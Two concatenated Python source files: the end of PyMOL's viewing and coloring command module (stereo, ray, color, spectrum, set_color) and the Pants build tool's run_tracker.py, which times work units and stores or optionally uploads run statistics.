_self.scene_order(' '.join(session['scene_order']))
_self._pymol._scene_dict_sc.rebuild(_self.get_scene_list())
return 1
def _convert_legacy_scene(key, scene_list, _self=cmd):
# Create a scene from the given legacy scene list and finally delete
# the colorection and rep selections.
scene_list += [None] * 5
view, active, frame, color, rep = [(0 if x is None else 1)
for x in scene_list[:5]]
if frame:
_self.frame(scene_list[2])
if view:
_self.set_view(scene_list[0], 0.0)
if active:
_self.disable()
_self.deselect()
_self.set_vis(scene_list[1])
if color:
_self.set_colorection(scene_list[3], key)
_self.del_colorection(scene_list[3], key)
if rep:
# only atomic representations
_self.hide('everything', '(*)')
sele_prefix = _self.get_legal_name('_scene_' + key + '_')
for rep_name in rep_list:
_self.show(rep_name, "?" + sele_prefix + rep_name)
_self.delete(sele_prefix + "*")
_self.scene(key, 'store', scene_list[5], view, color, active, rep, frame)
def stereo(toggle='on', quiet=1, *, _self=cmd):
'''
DESCRIPTION
"stereo" activates or deactives stereo mode.
USAGE
stereo [toggle]
ARGUMENTS
toggle = on, off, crosseye, walleye, quadbuffer, sidebyside, geowall, or openvr
EXAMPLES
stereo on
stereo off
stereo crosseye
NOTES
"quadbuffer" is the default stereo mode if hardware stereo is available.
otherwise, "crosseye" is the default.
PYMOL API
cmd.stereo(string toggle)
'''
toggle = stereo_dict[stereo_sc.auto_err(str(toggle),'toggle')]
with _self.lockcm:
return _cmd.stereo(_self._COb, toggle)
def turn(axis, angle, *, _self=cmd):
'''
DESCRIPTION
"turn" rotates the camera about one of the three primary axes,
centered at the origin.
USAGE
turn axis, angle
EXAMPLES
turn x, 90
turn y, 45
PYMOL API
cmd.turn(string axis, float angle)
SEE ALSO
move, rotate, translate, zoom, center, clip
'''
with _self.lockcm:
r = _cmd.turn(_self._COb,str(axis),float(angle))
return r
def full_screen(toggle=-1, *, _self=cmd):
'''
DESCRIPTION
"full_screen" enables or disables full screen mode.
USAGE
full_screen [toggle]
EXAMPLES
full_screen
full_screen on
full_screen off
NOTES
This does not work correctly on all platforms. If you encounter
trouble, try using the maximize button on the viewer window
instead.
'''
toggle = toggle_dict[toggle_sc.auto_err(str(toggle),'toggle')]
with _self.lockcm:
if _self.is_gui_thread():
return _cmd.full_screen(_self._COb,int(toggle))
return _self._do("full_screen %s" % (toggle), echo=0)
def rock(mode=-1, *, _self=cmd):
'''
DESCRIPTION
"rock" toggles Y axis rocking.
USAGE
rock
PYMOL API
cmd.rock()
'''
with _self.lockcm:
r = _cmd.rock(_self._COb,int(mode))
return r
def label(selection="(all)", expression="", quiet=1, *, _self=cmd):
'''
DESCRIPTION
"label" labels one or more atoms in a selection by evaluating an
Python expression referencing properties for each atom.
USAGE
label [ selection [, expression ]]
ARGUMENTS
selection = string: a selection-expression
expression = string: a Python expression that can be converted to a string
EXAMPLES
label chain A, chain
label name CA,"%s-%s" % (resn,resi)
label resi 200,"%1.3f" % partial_charge
NOTES
The symbols defined in the label name space for each atom are:
name, resi, resn, resv, chain, segi, model, alt, q, b, type,
index, rank, ID, ss, vdw, elec_radius, label, elem, geom,
flags, color, cartoon, valence, formal_charge, partial_charge,
numeric_type, text_type, stereo
All strings in the expression must be explicitly quoted.
This operation typically takes several seconds per thousand atoms
labelled.
To clear labels, simply omit the expression or set it to ''.
'''
# preprocess selection
selection = selector.process(selection)
#
with _self.lockcm:
return _cmd.label(_self._COb, selection, expression, quiet)
def label2(selection="(all)", expression="", quiet=1, *, _self=cmd):
# preprocess selection
selection = selector.process(selection)
#
with _self.lockcm:
return _cmd.label2(_self._COb, selection, expression, quiet)
def window(action='show', x=0, y=0, width=0, height=0, *, _self=cmd):
'''
DESCRIPTION
"window" controls the visibility of PyMOL\'s output window
USAGE
window [ action [, x [, y [, width [, height ]]]]]
PYMOL API
cmd.window(string action, int x, int y, int width, int height)
'''
action = window_sc.auto_err(action,'action')
action = window_dict[str(action)]
with _self.lockcm:
from pymol.gui import get_qtwindow as getPyMOLWindow
qt_window = getPyMOLWindow()
if qt_window:
r = DEFAULT_SUCCESS
qt_window.window_cmd(action, int(x),int(y),int(width),int(height))
else:
r = _cmd.window(_self._COb,action,int(x),int(y),int(width),int(height))
return r
def viewport(width=-1,height=-1, *, _self=cmd):
'''
DESCRIPTION
"viewport" changes the size of the graphics display area.
USAGE
viewport width, height
PYMOL API
cmd.viewport(int width, int height)
'''
if cmd.is_string(width) and height == -1:
width = _self.safe_eval(width)
if _self.is_sequence(width):
colorprinting.warning(" Warning: Tuple-syntax (parentheses) "
"for viewport is deprecated")
width, height = width
if not cmd.is_gui_thread():
_self.do("viewport %d,%d"%(int(width),int(height)),0)
return None
with _self.lockcm:
return _cmd.viewport(_self._COb, int(width), int(height))
def bg_color(color="black", *, _self=cmd):
'''
DESCRIPTION
"bg_color" sets the background color.
USAGE
bg_color [ color ]
ARGUMENTS
color = string: color name or number {default: black}
EXAMPLES
bg_color grey30
bg_color
NOTES
To obtain a transparent background, "unset opaque_background", and
then use "ray".
SEE ALSO
set_color, ray
PYMOL API
cmd.bg_color(string color)
'''
color = _self._interpret_color(_self,color)
with _self.lockcm:
r = _cmd.bg_color(_self._COb,str(color))
return r
cartoon_dict = {
'skip' : -1,
'automatic' : 0,
'loop' : 1,
'rectangle' : 2,
'oval' : 3,
'tube' : 4,
'arrow' : 5,
'dumbbell' : 6,
'putty' : 7,
'dash' : 8,
}
cartoon_sc = Shortcut(cartoon_dict.keys())
def cartoon(type, selection="(all)", *, _self=cmd):
'''
DESCRIPTION
"cartoon" changes the default cartoon representation for a set of atoms.
USAGE
cartoon type, selection
ARGUMENTS
type = automatic, skip, loop, rectangle, oval, tube, arrow, dumbbell
PYMOL API
cmd.cartoon(string type, string selection)
EXAMPLES
cartoon rectangle, chain A
cartoon skip, resi 145-156
NOTES
This command is rarely required since the default "automatic" mode
chooses cartoons according to the information in the PDB HELIX and
SHEET records.
'''
# preprocess selection
selection = selector.process(selection)
#
type = cartoon_dict[cartoon_sc.auto_err(str(type),'type')];
with _self.lockcm:
return _cmd.cartoon(_self._COb, selection, int(type))
def _ray(width,height,antialias,angle,shift,renderer,quiet,_self=cmd):
r = DEFAULT_ERROR
try:
_self.lock_without_glut()
try:
_cmd.set_busy(_self._COb,1)
r = _cmd.render(_self._COb,int(width),int(height),
int(antialias),
float(angle),
float(shift),int(renderer),
int(quiet))
finally:
_cmd.set_busy(_self._COb,0)
finally:
_self.unlock(r)
return r
def capture(quiet=1, *, _self=cmd):
_self.draw(antialias=-2,quiet=quiet)
def draw(width=0, height=0, antialias=-1, quiet=1, *, _self=cmd):
'''
DESCRIPTION
"draw" creates an OpenGL-based image of the current frame.
USAGE
draw [width [,height [,antialias ]]]
ARGUMENTS
width = integer {default: 0 (current)}
height = integer {default: 0 (current)}
antialias = integer {default: -1 (use antialias setting)}
EXAMPLES
draw
draw 1600
NOTES
Default width and height are taken from the current viewpoint. If
one is specified but not the other, then the missing value is
scaled so as to preserve the current aspect ratio.
Because this feature uses the OpenGL rendering context to piece
together the image, it does not work when running in the
command-line only mode.
On certain graphics hardware, "unset opaque_background" followed
by "draw" will produce an image with a transparent background.
However, better results can usually be obtained using "ray".
PYMOL API
cmd.draw(int width, int height, int antialias, int quiet)
SEE ALSO
ray, png, save
'''
# stop movies and sculpting if they're on...
if _self.get_movie_playing():
_self.mstop()
if _self.get_setting_boolean("sculpting"):
_self.set("sculpting","off",quiet=1)
# make sure that there aren't any pending display events
# TODO breaks QOpenGLWidget
# _self.refresh()
#
with _self.lockcm:
r = _cmd.draw(_self._COb,int(width),int(height),
int(antialias),int(quiet))
return r
def ray(width=0, height=0, antialias=-1, angle=0.0, shift=0.0,
renderer=-1, quiet=1, async_=0, _self=cmd, **kwargs):
'''
DESCRIPTION
"ray" creates a ray-traced image of the current frame. This
can take some time (up to several minutes, depending on image
complexity).
USAGE
ray [width [,height [,antialias [,angle [,shift [,renderer [,quiet
[,async ]]]]]]]]]
ARGUMENTS
width = integer {default: 0 (current)}
height = integer {default: 0 (current)}
antialias = integer {default: -1 (use antialias setting)}
angle = float: y-axis rotation for stereo image generation
{default: 0.0}
shift = float: x-axis translation for stereo image generation
{default: 0.0}
renderer = -1, 0, 1, or 2: respectively, default, built-in,
pov-ray, or dry-run {default: 0}
async = 0 or 1: should rendering be done in a background thread?
EXAMPLES
ray
ray 1024,768
ray renderer=2
NOTES
Default width and height are taken from the current viewpoint. If
one is specified but not the other, then the missing value is
scaled so as to preserve the current aspect ratio.
angle and shift can be used to generate matched stereo pairs
renderer = 1 uses PovRay. This is Unix-only and you must have
"povray" in your path. It utilizes two two temporary files:
"tmp_pymol.pov" and "tmp_pymol.png".
See "help faster" for optimization tips with the builtin renderer.
See "help povray" for how to use PovRay instead of PyMOL\'s
built-in ray-tracing engine.
PYMOL API
cmd.ray(int width, int height, int antialias, float angle,
float shift, int renderer, int quiet, int async)
SEE ALSO
draw, png, save
'''
async_ = int(kwargs.pop('async', async_))
if kwargs:
raise pymol.CmdException('unknown argument: ' + ', '.join(kwargs))
arg_tup = (int(width),int(height),
int(antialias),float(angle),
float(shift),int(renderer),int(quiet),_self)
# stop movies, rocking, and sculpting if they're on...
if _self.get_movie_playing():
_self.mstop()
if _self.get_setting_boolean("sculpting"):
_self.set("sculpting","off",quiet=1)
if _self.rock(-2)>0:
_self.rock(0)
#
if not async_:
r = _ray(*arg_tup)
else:
render_thread = threading.Thread(target=_ray, args=arg_tup)
render_thread.daemon = True
render_thread.start()
r = DEFAULT_SUCCESS
return r
def refresh(_self=cmd):
'''
DESCRIPTION
"refresh" causes the scene to be redrawn as soon as the operating
system allows it to be done.
USAGE
refresh
PYMOL API
cmd.refresh()
SEE ALSO
rebuild
'''
with _self.lockcm:
if _self.is_gui_thread():
return _cmd.refresh_now(_self._COb)
return _self._do("_ cmd._refresh()")
def reset(object='', *, _self=cmd):
'''
DESCRIPTION
"reset" restores the rotation matrix to identity, sets the origin
to the center of mass (approx.) and zooms the window and clipping
planes to cover all objects. Alternatively, it can reset object
matrices.
USAGE
reset [ object ]
PYMOL API
cmd.reset()
'''
with _self.lockcm:
return _cmd.reset(_self._COb, str(object))
def dirty(_self=cmd): # OBSOLETE?
with _self.lockcm:
r = _cmd.dirty(_self._COb)
return r
def meter_reset(_self=cmd):
'''
DESCRIPTION
"meter_reset" resets the frames per secound counter.
USAGE
meter_reset
'''
with _self.lockcm:
r = _cmd.reset_rate(_self._COb)
return r
def load_png(filename, movie=1, stereo=-1, quiet=0, *, _self=cmd):
'''
DESCRIPTION
"load_png" loads and displays a PNG file from disk.
USAGE
load_png filename
NOTES
If the displayed image is too big for the window, it will be
reduced 2-fold repeatedly until it fits.
'''
filename = _self.exp_path(str(filename))
with _self.lockcm:
return _cmd.load_png(_self._COb, filename, int(movie), int(stereo),
int(quiet))
def rebuild(selection='all',representation='everything', *, _self=cmd):
'''
DESCRIPTION
"rebuild" forces PyMOL to recreate geometric objects in
case any of them have gone out of sync.
USAGE
rebuild [selection [, representation ]]
ARGUMENTS
selection = string {default: all}
representation = string: {default: everything}
PYMOL API
cmd.rebuild(string selection, string representation)
SEE ALSO
refresh
'''
selection = selector.process(selection)
representation = repres_sc.auto_err(representation,'representation')
repn = repres[representation]
with _self.lockcm:
return _cmd.rebuild(_self._COb, selection, repn)
def recolor(selection='all', representation='everything', *, _self=cmd):
'''
DESCRIPTION
"recolor" forces reapplication of colors to existing objects.
USAGE
recolor [selection [, representation ]]
ARGUMENTS
selection = string {default: all}
representation = string {default: everything}
NOTES
This command often needs to be executed after "set_color" has been
used to redefine one or more existing colors.
PYMOL API
cmd.recolor(string selection = 'all', string representation = 'everything')
SEE ALSO
color, set_color
'''
selection = selector.process(selection)
representation = repres_sc.auto_err(representation,'representation')
repn = repres[representation]
with _self.lockcm:
return _cmd.recolor(_self._COb, selection, repn)
def color(color, selection="(all)", quiet=1, flags=0, *, _self=cmd):
'''
DESCRIPTION
"color" changes the color of objects or atoms.
USAGE
color color [, selection ]
ARGUMENTS
color = string: color name or number
selection = string: selection-expression or name-pattern
corresponding to the atoms or objects to be colored
{default: (all)}.
NOTES
When using color ramps, the ramp can be used as a color.
PYMOL API
cmd.color(string color, string selection, int quiet)
SEE ALSO
color_deep, set_color, recolor
EXAMPLE
color cyan
color yellow, chain A
'''
# preprocess selection
selection = selector.process(selection)
color = _self._interpret_color(_self,str(color))
with _self.lockcm:
return _cmd.color(_self._COb, str(color), str(selection),
int(flags), int(quiet))
def color_deep(color, name='all', quiet=1, *, _self=cmd):
'''
DESCRIPTION
Unset all object and atom level (not global) color settings and
apply given color.
ARGUMENTS
color = str: color name or number
name = str: object name or pattern {default: all}
SEE ALSO
color, unset_deep
'''
from pymol.menu import rep_setting_lists
_self.unset_deep([s for L in rep_setting_lists for (r, s) in L if s],
name, updates=0, quiet=quiet)
_self.color(color, name, quiet=quiet)
import colorsys
_spectrumany_interpolations = {
'hls': (colorsys.rgb_to_hls, colorsys.hls_to_rgb),
'hsv': (colorsys.rgb_to_hsv, colorsys.hsv_to_rgb),
'rgb': ((lambda *rgb: rgb), (lambda *rgb: rgb)),
}
def spectrumany(expression, colors, selection='(all)', minimum=None,
maximum=None, quiet=1, interpolation='rgb', *, _self=cmd):
'''
DESCRIPTION
Pure python implementation of the spectrum command. Supports arbitrary
color lists instead of palettes and any numerical atom property which
works in iterate as expression.
Non-numeric values (like resn) will be enumerated.
This is not a separate PyMOL command but is used as a fallback in "spectrum".
'''
from . import CmdException
try:
from_rgb, to_rgb = _spectrumany_interpolations[interpolation]
except KeyError:
raise CmdException('interpolation must be one of {}'.format(
list(_spectrumany_interpolations)))
if ' ' not in colors:
colors = palette_colors_dict.get(colors) or colors.replace('_', ' ')
quiet, colors = int(quiet), colors.split()
n_colors = len(colors)
if n_colors < 2:
raise CmdException('please provide at least 2 colors')
col_tuples = [_self.get_color_tuple(i) for i in colors]
if None in col_tuples:
raise CmdException('unknown color')
col_tuples = [from_rgb(*c) for c in col_tuples]
expression = {'pc': 'partial_charge', 'fc': 'formal_charge',
'resi': 'resv'}.get(expression, expression)
if expression == 'count':
e_list = list(range(_self.count_atoms(selection)))
else:
e_list = []
_self.iterate(selection, 'e_list.append(%s)' % (expression), space=locals())
try:
v_list = [float(v) for v in e_list if v is not None]
except (TypeError, ValueError):
if not quiet:
print(' Spectrum: Expression is non-numeric, enumerating values')
v_list = e_list = list(map(sorted(set(e_list)).index, e_list))
if not v_list:
return (0., 0.)
if minimum is None: minimum = min(v_list)
if maximum is None: maximum = max(v_list)
r = minimum, maximum = float(minimum), float(maximum)
if not quiet:
print(' Spectrum: range (%.5f to %.5f)' % r)
val_range = maximum - minimum
if not val_range:
_self.color(colors[0], selection)
return r
e_it = iter(e_list)
def next_color():
v = next(e_it)
if v is None:
return False
v = min(1.0, max(0.0, (float(v) - minimum) / val_range)) * (n_colors - 1)
i = min(int(v), n_colors - 2)
p = v - i
col = [(col_tuples[i+1][j] * p + col_tuples[i][j] * (1.0 - p))
for j in range(3)]
rgb = [int(0xFF * v) for v in to_rgb(*col)]
return 0x40000000 + rgb[0] * 0x10000 + rgb[1] * 0x100 + rgb[2]
_self.alter(selection, 'color = next_color() or color', space=locals())
_self.recolor(selection)
return r
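# A minimal standalone sketch of the blending used in next_color() above (not part
# of PyMOL's API; assumes plain RGB tuples and maximum > minimum): the normalized
# value selects one of n_colors - 1 segments and interpolates linearly between the
# two bracketing colors.
def _example_blend(value, minimum, maximum, col_tuples):
    """Return an interpolated (r, g, b) tuple for value in [minimum, maximum]."""
    n_colors = len(col_tuples)
    v = min(1.0, max(0.0, (value - minimum) / (maximum - minimum))) * (n_colors - 1)
    i = min(int(v), n_colors - 2)  # index of the lower bracketing color
    p = v - i                      # fractional position within that segment
    return tuple(col_tuples[i + 1][j] * p + col_tuples[i][j] * (1.0 - p)
                 for j in range(3))
# e.g. _example_blend(5.0, 0.0, 10.0, [(0, 0, 1), (1, 1, 1), (1, 0, 0)]) == (1.0, 1.0, 1.0)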
def spectrum(expression="count", palette="rainbow",
selection="(all)", minimum=None, maximum=None,
byres=0, quiet=1, interpolation='rgb', *, _self=cmd):
'''
DESCRIPTION
"spectrum" colors atoms with a spectrum of colors based on an atomic
property.
USAGE
spectrum [expression [, palette [, selection [, minimum [, maximum [, byres ]]]]]]
ARGUMENTS
expression = count, b, q, or pc: respectively, atom count, temperature factor,
occupancy, or partial charge {default: count}
palette = string: palette name or space separated list of colors
{default: rainbow}
selection = string: atoms to color {default: (all)}
minimum = float: {default: None (automatic)}
maximum = float: {default: None (automatic)}
byres = integer: controls whether coloring is applied per-residue {default: 0}
EXAMPLES
spectrum b, blue_red, minimum=10, maximum=50
spectrum count, rainbow_rev, chain A, byres=1
NOTES
Available palettes include:
blue_green blue_magenta blue_red blue_white_green
blue_white_magenta blue_white_red blue_white_yellow blue_yellow
cbmr cyan_magenta cyan_red cyan_white_magenta cyan_white_red
cyan_white_yellow cyan_yellow gcbmry green_blue green_magenta
green_red green_white_blue green_white_magenta green_white_red
green_white_yellow green_yellow green_yellow_red magenta_blue
magenta_cyan magenta_green magenta_white_blue
magenta_white_cyan magenta_white_green magenta_white_yellow
magenta_yellow rainbow rainbow2 rainbow2_rev rainbow_cycle
rainbow_cycle_rev rainbow_rev red_blue red_cyan red_green
red_white_blue red_white_cyan red_white_green red_white_yellow
red_yellow red_yellow_green rmbc yellow_blue yellow_cyan
yellow_cyan_white yellow_green yellow_magenta yellow_red
yellow_white_blue yellow_white_green yellow_white_magenta
yellow_white_red yrmbcg
PYMOL API
def spectrum(string expression, string palette,
string selection, float minimum, float maximum,
int byres, int quiet)
'''
palette_hit = palette_sc.shortcut.get(palette)
if palette_hit:
palette = palette_hit
if not expression.replace('_', '').isalpha() or not palette_hit:
return spectrumany(expression, palette, selection,
minimum, maximum, quiet, interpolation, _self=_self)
(prefix,digits,first,last) = palette_dict[str(palette)]
if (maximum is None) or (minimum is None):
minimum = 0 # signal to auto-adjust levels
maximum = -1
# preprocess selection
selection = selector.process(selection)
#
with _self.lockcm:
r = _cmd.spectrum(_self._COb,str(selection),str(expression),
float(minimum),float(maximum),
int(first),int(last),str(prefix),
int(digits),int(byres),int(quiet))
return r
def set_color(name, rgb, mode=0, quiet=1, *, _self=cmd):
'''
DESCRIPTION
"set_color" defines a new color using the red, green, and blue
(RGB) color components.
USAGE
set_color name, rgb
ARGUMENTS
name = string: name for the new or existing color
rgb = list of numbers: [red, green, blue] each and all in the range
(0.0, 1.0) or (0, 255)
EXAMPLES
set_color red, [ 1.0, 0.0, 0.0 ]
set_color yellow, [ 255, 255, 0 ]
NOTES
PyMOL automatically infers the range based on the input arguments.
It may be necessary to issue the "recolor" command in order to force
recoloring of existing objects.
SEE ALSO
recolor
PYMOL API
cmd.set_color(string name, list-of-numbers rgb, int mode )
'''
if isinstance(rgb, (str, bytes)):
rgb = safe_list_eval(rgb)
if not isinstance(rgb, (list, tuple)) or len(rgb) != 3:
raise pymol.CmdException(
"color specification must be a list such as [ 1.0, 0.0, 0.0 ]")
rgb = [float(c) for c in rgb]
if rgb[0] > 1.0 or rgb[1] > 1.0 or rgb[2] > 1.0:
rgb = [c / 0xFF for c in rgb]
with _self.lockcm:
r = _cmd.colordef(_self._COb, str(name), rgb[0], rgb[1], rgb[2],
int(mode), int(quiet))
_self._invalidate_color_sc()
return r
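# Illustrative note: because any component above 1.0 triggers the 0-255
# interpretation, set_color('example', [255, 128, 0]) stores the same color as
# set_color('example', [1.0, 128 / 255.0, 0.0]).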
# Aliases for Mother England.
colour = color
set_colour = set_color
bg_colour = bg_color
recolour = recolor
|
run_tracker.py
|
# coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import json
import multiprocessing
import os
import sys
import threading
import time
import uuid
from contextlib import contextmanager
import requests
from pants.base.build_environment import get_pants_cachedir
from pants.base.run_info import RunInfo
from pants.base.worker_pool import SubprocPool, WorkerPool
from pants.base.workunit import WorkUnit
from pants.goal.aggregated_timings import AggregatedTimings
from pants.goal.artifact_cache_stats import ArtifactCacheStats
from pants.reporting.report import Report
from pants.stats.statsdb import StatsDBFactory
from pants.subsystem.subsystem import Subsystem
from pants.util.dirutil import relative_symlink, safe_file_dump
class RunTracker(Subsystem):
"""Tracks and times the execution of a pants run.
Also manages background work.
Use like this:
run_tracker.start()
with run_tracker.new_workunit('compile'):
with run_tracker.new_workunit('java'):
...
with run_tracker.new_workunit('scala'):
...
run_tracker.close()
Can track execution against multiple 'roots', e.g., one for the main thread and another for
background threads.
:API: public
"""
options_scope = 'run-tracker'
# The name of the tracking root for the main thread (and the foreground worker threads).
DEFAULT_ROOT_NAME = 'main'
# The name of the tracking root for the background worker threads.
BACKGROUND_ROOT_NAME = 'background'
@classmethod
def subsystem_dependencies(cls):
return (StatsDBFactory,)
@classmethod
def register_options(cls, register):
register('--stats-upload-url', advanced=True, default=None,
help='Upload stats to this URL on run completion.')
register('--stats-upload-timeout', advanced=True, type=int, default=2,
help='Wait at most this many seconds for the stats upload to complete.')
register('--num-foreground-workers', advanced=True, type=int,
default=multiprocessing.cpu_count(),
help='Number of threads for foreground work.')
register('--num-background-workers', advanced=True, type=int,
default=multiprocessing.cpu_count(),
help='Number of threads for background work.')
register('--stats-local-json-file', advanced=True, default=None,
help='Write stats to this local json file on run completion.')
def __init__(self, *args, **kwargs):
"""
:API: public
"""
super(RunTracker, self).__init__(*args, **kwargs)
run_timestamp = time.time()
cmd_line = ' '.join(['pants'] + sys.argv[1:])
# run_id is safe for use in paths.
millis = int((run_timestamp * 1000) % 1000)
run_id = 'pants_run_{}_{}_{}'.format(
time.strftime('%Y_%m_%d_%H_%M_%S', time.localtime(run_timestamp)), millis,
uuid.uuid4().hex)
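# e.g. run_id == 'pants_run_2014_01_02_03_04_05_123_<32-char uuid4 hex>'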
info_dir = os.path.join(self.get_options().pants_workdir, self.options_scope)
self.run_info_dir = os.path.join(info_dir, run_id)
self.run_info = RunInfo(os.path.join(self.run_info_dir, 'info'))
self.run_info.add_basic_info(run_id, run_timestamp)
self.run_info.add_info('cmd_line', cmd_line)
# Create a 'latest' symlink after the add_info calls, so we're guaranteed that the files exist.
link_to_latest = os.path.join(os.path.dirname(self.run_info_dir), 'latest')
relative_symlink(self.run_info_dir, link_to_latest)
# A lock to ensure that adding to stats at the end of a workunit
# operates thread-safely.
self._stats_lock = threading.Lock()
# Time spent in a workunit, including its children.
self.cumulative_timings = AggregatedTimings(os.path.join(self.run_info_dir,
'cumulative_timings'))
# Time spent in a workunit, not including its children.
self.self_timings = AggregatedTimings(os.path.join(self.run_info_dir, 'self_timings'))
# Hit/miss stats for the artifact cache.
self.artifact_cache_stats = \
ArtifactCacheStats(os.path.join(self.run_info_dir, 'artifact_cache_stats'))
# Log of success/failure/aborted for each workunit.
self.outcomes = {}
# Number of threads for foreground work.
self._num_foreground_workers = self.get_options().num_foreground_workers
# Number of threads for background work.
self._num_background_workers = self.get_options().num_background_workers
# We report to this Report.
self.report = None
# self._threadlocal.current_workunit contains the current workunit for the calling thread.
# Note that multiple threads may share a name (e.g., all the threads in a pool).
self._threadlocal = threading.local()
# For main thread work. Created on start().
self._main_root_workunit = None
# For background work. Created lazily if needed.
self._background_worker_pool = None
self._background_root_workunit = None
# Trigger subproc pool init while our memory image is still clean (see SubprocPool docstring).
SubprocPool.set_num_processes(self._num_foreground_workers)
SubprocPool.foreground()
self._aborted = False
def register_thread(self, parent_workunit):
"""Register the parent workunit for all work in the calling thread.
Multiple threads may have the same parent (e.g., all the threads in a pool).
"""
self._threadlocal.current_workunit = parent_workunit
def is_under_main_root(self, workunit):
"""Is the workunit running under the main thread's root."""
return workunit.root() == self._main_root_workunit
def start(self, report):
"""Start tracking this pants run.
report: an instance of pants.reporting.Report.
"""
self.report = report
self.report.open()
self._main_root_workunit = WorkUnit(run_info_dir=self.run_info_dir, parent=None,
name=RunTracker.DEFAULT_ROOT_NAME, cmd=None)
self.register_thread(self._main_root_workunit)
self._main_root_workunit.start()
self.report.start_workunit(self._main_root_workunit)
def set_root_outcome(self, outcome):
"""Useful for setup code that doesn't have a reference to a workunit."""
self._main_root_workunit.set_outcome(outcome)
@contextmanager
def new_workunit(self, name, labels=None, cmd='', log_config=None):
"""Creates a (hierarchical) subunit of work for the purpose of timing and reporting.
- name: A short name for this work. E.g., 'resolve', 'compile', 'scala', 'zinc'.
- labels: An optional iterable of labels. The reporters can use this to decide how to
display information about this work.
- cmd: An optional longer string representing this work.
E.g., the cmd line of a compiler invocation.
- log_config: An optional tuple WorkUnit.LogConfig of task-level options affecting reporting.
Use like this:
with run_tracker.new_workunit(name='compile', labels=[WorkUnitLabel.TASK]) as workunit:
<do scoped work here>
<set the outcome on workunit if necessary>
Note that the outcome will automatically be set to failure if an exception is raised
in a workunit, and to success otherwise, so usually you only need to set the
outcome explicitly if you want to set it to warning.
:API: public
"""
parent = self._threadlocal.current_workunit
with self.new_workunit_under_parent(name, parent=parent, labels=labels, cmd=cmd,
log_config=log_config) as workunit:
self._threadlocal.current_workunit = workunit
try:
yield workunit
finally:
self._threadlocal.current_workunit = parent
@contextmanager
def new_workunit_under_parent(self, name, parent, labels=None, cmd='', log_config=None):
"""Creates a (hierarchical) subunit of work for the purpose of timing and reporting.
- name: A short name for this work. E.g., 'resolve', 'compile', 'scala', 'zinc'.
- parent: The new workunit is created under this parent.
- labels: An optional iterable of labels. The reporters can use this to decide how to
display information about this work.
- cmd: An optional longer string representing this work.
E.g., the cmd line of a compiler invocation.
Task code should not typically call this directly.
:API: public
"""
workunit = WorkUnit(run_info_dir=self.run_info_dir, parent=parent, name=name, labels=labels,
cmd=cmd, log_config=log_config)
workunit.start()
outcome = WorkUnit.FAILURE # Default to failure; we will override it if we get success/abort.
try:
self.report.start_workunit(workunit)
yield workunit
except KeyboardInterrupt:
outcome = WorkUnit.ABORTED
self._aborted = True
raise
else:
outcome = WorkUnit.SUCCESS
finally:
workunit.set_outcome(outcome)
self.end_workunit(workunit)
def log(self, level, *msg_elements):
"""Log a message against the current workunit."""
self.report.log(self._threadlocal.current_workunit, level, *msg_elements)
@classmethod
def post_stats(cls, url, stats, timeout=2):
"""POST stats to the given url.
:return: True if upload was successful, False otherwise.
"""
def error(msg):
# Report already closed, so just print the error.
print('WARNING: Failed to upload stats to {} due to {}'.format(url, msg),
file=sys.stderr)
return False
# TODO(benjy): The upload protocol currently requires separate top-level params, with JSON
# values. Probably better for there to be one top-level JSON value, namely json.dumps(stats).
# But this will first require changing the upload receiver at every shop that uses this
# (probably only Foursquare at present).
params = {k: json.dumps(v) for (k, v) in stats.items()}
try:
r = requests.post(url, data=params, timeout=timeout)
if r.status_code != requests.codes.ok:
return error("HTTP error code: {}".format(r.status_code))
except Exception as e: # Broad catch - we don't want to fail the build over upload errors.
return error("Error: {}".format(e))
return True
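# Illustrative sketch of the upload payload, assuming `stats` has the shape built in
# store_stats() below: each top-level key becomes its own form parameter with a
# JSON-encoded value, e.g.
#   {'run_info': '{"id": "pants_run_..."}', 'outcomes': '{"main": "SUCCESS"}', ...}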
@classmethod
def write_stats_to_json(cls, file_name, stats):
"""Write stats to a local json file.
:return: True if successfully written, False otherwise.
"""
params = json.dumps(stats)
try:
with open(file_name, 'w') as f:
f.write(params)
except Exception as e: # Broad catch - we don't want to fail the build over stats-related failures.
print('WARNING: Failed to write stats to {} due to Error: {}'.format(file_name, e),
file=sys.stderr)
return False
return True
def store_stats(self):
"""Store stats about this run in local and optionally remote stats dbs."""
stats = {
'run_info': self.run_info.get_as_dict(),
'cumulative_timings': self.cumulative_timings.get_all(),
'self_timings': self.self_timings.get_all(),
'artifact_cache_stats': self.artifact_cache_stats.get_all(),
'outcomes': self.outcomes
}
# Dump individual stat file.
# TODO(benjy): Do we really need these, once the statsdb is mature?
stats_file = os.path.join(get_pants_cachedir(), 'stats',
'{}.json'.format(self.run_info.get_info('id')))
safe_file_dump(stats_file, json.dumps(stats))
# Add to local stats db.
StatsDBFactory.global_instance().get_db().insert_stats(stats)
# Upload to remote stats db.
stats_url = self.get_options().stats_upload_url
if stats_url:
t = threading.Thread(target=self.post_stats, args=(stats_url, stats, self.get_options().stats_upload_timeout))
t.start()
# Write stats to local json file.
stats_json_file_name = self.get_options().stats_local_json_file
if stats_json_file_name:
self.write_stats_to_json(stats_json_file_name, stats)
_log_levels = [Report.ERROR, Report.ERROR, Report.WARN, Report.INFO, Report.INFO]
def end(self):
"""This pants run is over, so stop tracking it.
Note: If end() has been called once, subsequent calls are no-ops.
:return: 0 for success, 1 for failure.
"""
if self._background_worker_pool:
if self._aborted:
self.log(Report.INFO, "Aborting background workers.")
self._background_worker_pool.abort()
else:
self.log(Report.INFO, "Waiting for background workers to finish.")
self._background_worker_pool.shutdown()
self.end_workunit(self._background_root_workunit)
self.shutdown_worker_pool()
# Run a dummy work unit to write out one last timestamp.
with self.new_workunit("complete"):
pass
self.end_workunit(self._main_root_workunit)
outcome = self._main_root_workunit.outcome()
if self._background_root_workunit:
outcome = min(outcome, self._background_root_workunit.outcome())
outcome_str = WorkUnit.outcome_string(outcome)
log_level = RunTracker._log_levels[outcome]
self.log(log_level, outcome_str)
if self.run_info.get_info('outcome') is None:
# If the goal is clean-all then the run info dir no longer exists, so ignore that error.
self.run_info.add_info('outcome', outcome_str, ignore_errors=True)
self.report.close()
self.store_stats()
return 1 if outcome in [WorkUnit.FAILURE, WorkUnit.ABORTED] else 0
def end_workunit(self, workunit):
self.report.end_workunit(workunit)
path, duration, self_time, is_tool = workunit.end()
# These three operations may not be thread-safe, and workunits may run in separate threads
# and thus end concurrently, so we want to lock these operations.
with self._stats_lock:
